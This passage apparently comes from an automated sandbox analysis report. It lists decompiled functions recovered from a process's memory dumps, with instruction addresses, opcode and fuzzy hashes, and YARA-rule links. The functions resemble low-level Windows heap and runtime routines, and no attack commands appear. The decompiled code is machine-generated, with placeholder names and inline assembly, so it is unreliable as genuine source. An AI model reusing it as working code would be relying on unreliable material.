                        0x02b24d6c
                        0x02b24d71
                        0x02b24d77
                        0x02b24d7f
                        0x02b24d8c
                        0x02b24d8e
                        0x02b24dad
                        0x02b24db0
                        0x02b24db7
                        0x02b24db8
                        0x02b24db9
                        0x02b24dba
                        0x02b24dbb
                        0x02b24dc1
                        0x02b24dc8
                        0x02b24dcc
                        0x02b24dd5
                        0x02b24dde
                        0x02b24ddf
                        0x02b24de0
                        0x02b24de1
                        0x02b24de6
                        0x02b24de7
                        0x02b24de9
                        0x02b24df3
                        0x00000000
                        0x00000000
                        0x02b66c7c
                        0x02b66c8a
                        0x02b66c8a
                        0x02b66c9d
                        0x02b66ca7
                        0x02b66cac
                        0x02b66cb2
                        0x02b66cb9
                        0x00000000
                        0x02b66cbf
                        0x02b66cbf
                        0x00000000
                        0x02b66cbf
                        0x02b66cb9
                        0x02b24dfb
                        0x02b66ccf
                        0x02b66cd3
                        0x02b24e32
                        0x02b24e39
                        0x02b66ce0
                        0x02b66cf2
                        0x02b66cf2
                        0x02b66ce0
                        0x02b24e3f
                        0x02b24e41
                        0x02b24e51
                        0x02b24e51
                        0x02b24e03
                        0x02b24e03
                        0x02b24e09
                        0x02b24e0f
                        0x02b24e57
                        0x00000000
                        0x00000000
                        0x02b24e1b
                        0x02b24e30
                        0x02b24e5b
                        0x02b24e5b
                        0x00000000
                        0x02b24e30
                        0x02b24e11
                        0x02b24e11
                        0x02b24e16
                        0x00000000
                        0x02b24e16
                        0x02b24e01
                        0x00000000
                        0x02b24e01
                        0x02b24da5
                        0x02b66c6b
                        0x00000000
                        0x02b24dab
                        0x02b24dab
                        0x00000000
                        0x02b24dab

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb245bf64e47fa05eb2caa9e0cfb0a96117a92cf3f8bdfac1dbbf75814d2962e
                        • Instruction ID: 670c1cef7f65377e9909a41a18b41aaa4dbfe6ff3fd85e3b2ba44f56bf7776c9
                        • Opcode Fuzzy Hash: cb245bf64e47fa05eb2caa9e0cfb0a96117a92cf3f8bdfac1dbbf75814d2962e
                        • Instruction Fuzzy Hash: BB41A471A40728AFEB26DF14CC80F67B7BAEB45714F0040D9E9499B690DB74DD48CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BBAA16, Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02BBAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E02BBABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E02BBAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E02BBAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E02B9CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L02B177F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E02B17D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02BB131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E02B9CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                        0x02bbaa1f
                        0x02bbaa21
                        0x02bbaa23
                        0x02bbaa2b
                        0x02bbaa30
                        0x02bbaa36
                        0x02bbaa39
                        0x02bbaa42
                        0x02bbaa75
                        0x02bbaa7a
                        0x02bbaa7c
                        0x02bbaa7c
                        0x02bbaa88
                        0x02bbaa8a
                        0x02bbaa8f
                        0x02bbab02
                        0x02bbab04
                        0x02bbaa99
                        0x02bbaaa8
                        0x02bbaaaf
                        0x02bbaab3
                        0x02bbaacc
                        0x02bbaad1
                        0x02bbaad6
                        0x02bbaae0
                        0x02bbaaf3
                        0x02bbaaf9
                        0x02bbaafe
                        0x02bbaafe
                        0x02bbaaf3
                        0x02bbaad6
                        0x02bbaab3
                        0x02bbab07
                        0x02bbab0a
                        0x02bbab11
                        0x02bbab23
                        0x02bbab13
                        0x02bbab1c
                        0x02bbab1c
                        0x02bbab2b
                        0x02bbab44
                        0x02bbab44
                        0x02bbab51
                        0x02bbab51
                        0x02bbaa44
                        0x02bbaa47
                        0x02bbaa4c
                        0x00000000
                        0x00000000
                        0x02bbaa5a
                        0x02bbaa64
                        0x02bbaa72
                        0x00000000
                        0x02bbaa66
                        0x02bbaa66
                        0x02bbaa68
                        0x02bbaa6a
                        0x00000000
                        0x02bbaa6a

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: c81246cc25a7218010701ff3a3dfc93659c9990b42575ba3efee5323a794d57b
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: E631C332F006446BDB269B65C895BFFF7ABDF84310F0580E9E825A7251DBB49D00CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B08A0A, Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E02B08A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x2bed360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E02B3B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E02B0E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x2ad1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E02B21DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E02B33C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E02B08999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                        0x02b08a0a
                        0x02b08a1c
                        0x02b08a23
                        0x02b08a2e
                        0x02b08a30
                        0x02b08a36
                        0x02b08a3c
                        0x02b08a3e
                        0x02b08a4a
                        0x02b08a52
                        0x02b08a9c
                        0x02b08aae
                        0x02b08a58
                        0x02b08a5e
                        0x02b08a6a
                        0x02b08a6f
                        0x02b08a75
                        0x02b08a7d
                        0x02b08a85
                        0x02b08a86
                        0x02b08a89
                        0x02b08a93
                        0x02b08a99
                        0x02b08a9b
                        0x00000000
                        0x02b08aaf
                        0x02b08abe
                        0x02b08ac3
                        0x02b08acb
                        0x02b08ad7
                        0x02b08ae0
                        0x02b08af1
                        0x00000000
                        0x02b08af1
                        0x02b08acd
                        0x02b08ad5
                        0x02b08afb
                        0x02b08afd
                        0x02b08aff
                        0x02b08b07
                        0x02b08b22
                        0x02b08b24
                        0x02b08b2a
                        0x02b08b2e
                        0x02b08b3f
                        0x02b08b78
                        0x02b08b41
                        0x02b08b52
                        0x02b08b54
                        0x02b08b5c
                        0x02b08b74
                        0x02b08b74
                        0x02b08b5c
                        0x02b08b3f
                        0x02b08b5e
                        0x02b08b61
                        0x02b08b64
                        0x02b08b64
                        0x02b08b6c
                        0x02b08b6c
                        0x02b08b11
                        0x02b59cd5
                        0x02b59cd5
                        0x02b08b17
                        0x02b08b1a
                        0x02b08b1a
                        0x00000000
                        0x02b08ad5
                        0x02b08a89

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dc905b52a6eb346a16a2ef94671e5e90efce5c31560ee5f6b5099fd9d869b0f
                        • Instruction ID: 093edf013dec6b7e02ec2dfb7c6ee7426d151c30b9db727d024019dc96988edb
                        • Opcode Fuzzy Hash: 1dc905b52a6eb346a16a2ef94671e5e90efce5c31560ee5f6b5099fd9d869b0f
                        • Instruction Fuzzy Hash: 914142B1A403289BDB25DF55C8C8BA9BBF5EB44300F1045E9D91997291DB719F84CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BBFDE2, Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E02BBFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E02BBFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E02BC0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E02B17D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E02BB1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E02BC2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E02BBC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E02BBDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E02B17D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E02BBA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                        0x02bbfde7
                        0x02bbfde8
                        0x02bbfdec
                        0x02bbfdee
                        0x02bbfdf5
                        0x02bbfdf7
                        0x02bbfdfc
                        0x02bbfe19
                        0x02bbfe22
                        0x02bbfe26
                        0x02bbfec6
                        0x02bbfecd
                        0x02bbfed5
                        0x02bbfee7
                        0x02bbfed7
                        0x02bbfee0
                        0x02bbfee0
                        0x02bbfeef
                        0x02bbff00
                        0x02bbff02
                        0x02bbff07
                        0x02bbff07
                        0x00000000
                        0x02bbfeef
                        0x02bbfe33
                        0x02bbfe55
                        0x02bbfe59
                        0x02bbfe5b
                        0x02bbfe5e
                        0x02bbfe69
                        0x02bbfe6d
                        0x02bbfe6d
                        0x02bbfe69
                        0x02bbfe35
                        0x02bbfe41
                        0x02bbfe41
                        0x02bbfe79
                        0x02bbfe8b
                        0x02bbfe7b
                        0x02bbfe84
                        0x02bbfe84
                        0x02bbfe93
                        0x00000000
                        0x02bbfea8
                        0x02bbfeba
                        0x00000000
                        0x02bbfeba
                        0x02bbfdfe
                        0x02bbfe01
                        0x02bbfe02
                        0x02bbfe08
                        0x02bbff0c
                        0x02bbff14
                        0x02bbff14

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 8230ebf0a9a5ed1c29c030789d364f5ae1d5405dcb72341f3c3c157f0efac710
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: 0231D636604644AFD7239B78CC48FBABBAAEF85750F1844D9F44A8BB41DBB4D841C710
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BBEA55, Relevance: .1, Instructions: 111COMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E02BBEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E02B12280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E02BBE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E02AFF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E02B0FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E02BBAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E02BBBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E02B17D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E02BAFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E02B0FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E02BBA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                        0x02bbea55
                        0x02bbea66
                        0x02bbea68
                        0x02bbea6c
                        0x02bbea6f
                        0x02bbea72
                        0x02bbea75
                        0x02bbea7a
                        0x02bbea7a
                        0x02bbea7e
                        0x02bbea80
                        0x02bbea85
                        0x02bbea8b
                        0x02bbeab5
                        0x02bbeabc
                        0x02bbeabf
                        0x02bbeabf
                        0x02bbeaca
                        0x02bbeace
                        0x02bbead0
                        0x02bbeae4
                        0x02bbeaeb
                        0x02bbeaf0
                        0x02bbeaf5
                        0x02bbeb09
                        0x02bbeb0d
                        0x02bbeb1d
                        0x02bbeb2d
                        0x02bbeb38
                        0x02bbeb3d
                        0x02bbeb41
                        0x02bbeb4a
                        0x02bbeb60
                        0x02bbeb4c
                        0x02bbeb52
                        0x02bbeb59
                        0x02bbeb59
                        0x02bbeb68
                        0x02bbeb71
                        0x02bbeb71
                        0x02bbea8d
                        0x02bbea8f
                        0x02bbea92
                        0x02bbea97
                        0x02bbea97
                        0x02bbea9b
                        0x02bbea9c
                        0x02bbea9e
                        0x02bbeaa6
                        0x02bbeaa6
                        0x02bbeb7e

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: 191d12d513e2d5b0a0ce4cea6e14b30a24e245232d32b70bf71cd1c635fb737a
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: D031B072604705ABC72ADF24C880AABB7EAFFC1310F44496DF95687690DF70E805CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B769A6, Relevance: .1, Instructions: 108COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E02B769A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x2bed360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L02B06C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E02B76BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E02B39980() >= 0) {
							E02B12280(_t56, 0x2be8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x2be8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x2be8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E02AFB6F0(0x2adc338, 0x2adc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E02B39520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E02B395D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E02B0FFB0(_t68, _t77, 0x2be8778);
				}
				_pop(_t78);
				return E02B3B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                        0x02b769b5
                        0x02b769be
                        0x02b769c3
                        0x02b769c9
                        0x02b769cc
                        0x02b769d1
                        0x02b769d3
                        0x02b769de
                        0x02b769e1
                        0x02b769ea
                        0x02b769f6
                        0x02b769fe
                        0x02b76a13
                        0x02b76a14
                        0x02b76a15
                        0x02b76a16
                        0x02b76a1e
                        0x02b76a26
                        0x02b76a31
                        0x02b76a36
                        0x02b76a37
                        0x02b76a40
                        0x02b76a49
                        0x02b76a4a
                        0x02b76a53
                        0x02b76a59
                        0x02b76a5d
                        0x02b76a5e
                        0x02b76a64
                        0x02b76a67
                        0x02b76a6a
                        0x02b76a6d
                        0x02b76a70
                        0x02b76a77
                        0x02b76a7d
                        0x02b76a86
                        0x02b76a89
                        0x02b76a9c
                        0x02b76a9f
                        0x02b76aa2
                        0x02b76aa5
                        0x02b76aaf
                        0x02b76ab1
                        0x02b76ab8
                        0x02b76ab9
                        0x02b76abb
                        0x02b76abe
                        0x02b76ac5
                        0x02b76ac5
                        0x02b76aaf
                        0x02b76a40
                        0x02b76a26
                        0x02b769fe
                        0x02b76ace
                        0x02b76ad0
                        0x02b76ad3
                        0x02b76ad8
                        0x02b76adf
                        0x02b76adf
                        0x02b76ae8
                        0x02b76aef
                        0x02b76aef
                        0x02b76af9
                        0x02b76b06

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4174cb03d057467136980c21db17faaaf7ac1e6205739ddce5d1c18997edb9b
                        • Instruction ID: f63f89f04d29b7f63f13c16756086505834dc100fd0a3827f416aef1e83d59f4
                        • Opcode Fuzzy Hash: f4174cb03d057467136980c21db17faaaf7ac1e6205739ddce5d1c18997edb9b
                        • Instruction Fuzzy Hash: 2541AEB1D00608AFDB14CFA4C941BFEBBF9EF48714F0485AAE925A7250EB709945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF5210, Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E02AF5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E02AF52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E02B395D0();
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E02B0EB70(_t54, 0x2be79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E02B395D0();
								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E02B0EB70(_t54, 0x2be79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E02B3F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E02B0EB70(_t54, 0x2be79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E02B395D0();
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                        0x02af5220
                        0x02af5224
                        0x02b50d13
                        0x02b50d16
                        0x02b50d19
                        0x02af522a
                        0x02af522a
                        0x02af522d
                        0x02af522d
                        0x02af5231
                        0x02af5235
                        0x02af5239
                        0x02b50d5c
                        0x02b50d62
                        0x00000000
                        0x00000000
                        0x02b50d6a
                        0x02b50d7b
                        0x02b50d7f
                        0x02b50d81
                        0x02b50d84
                        0x02b50d95
                        0x02b50d95
                        0x02b50d6c
                        0x02b50d71
                        0x02b50d71
                        0x02b50d9a
                        0x00000000
                        0x02af524a
                        0x02af524a
                        0x02af5250
                        0x02b50d24
                        0x02b50d35
                        0x02b50d39
                        0x02b50d3b
                        0x02b50d3e
                        0x02b50d50
                        0x02b50d50
                        0x02b50d26
                        0x02b50d2b
                        0x02b50d2b
                        0x00000000
                        0x02b50d55
                        0x02af5256
                        0x02af525b
                        0x02af5265
                        0x02b50da7
                        0x02af526b
                        0x02af526e
                        0x02af5272
                        0x02b50db1
                        0x02b50db4
                        0x02b50dc5
                        0x02b50dc5
                        0x02af5272
                        0x02af5278
                        0x02af527e
                        0x02af528a
                        0x02af528c
                        0x02af528d
                        0x00000000
                        0x02af5280
                        0x02af5282
                        0x02af5288
                        0x02af529f
                        0x02af5292
                        0x00000000
                        0x02af5292
                        0x00000000
                        0x02af5288
                        0x02af527e

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 074ce8a1bd19452f3fa5a4a35d57c37df9f3e3255a6342694d02d9e93e3a88b7
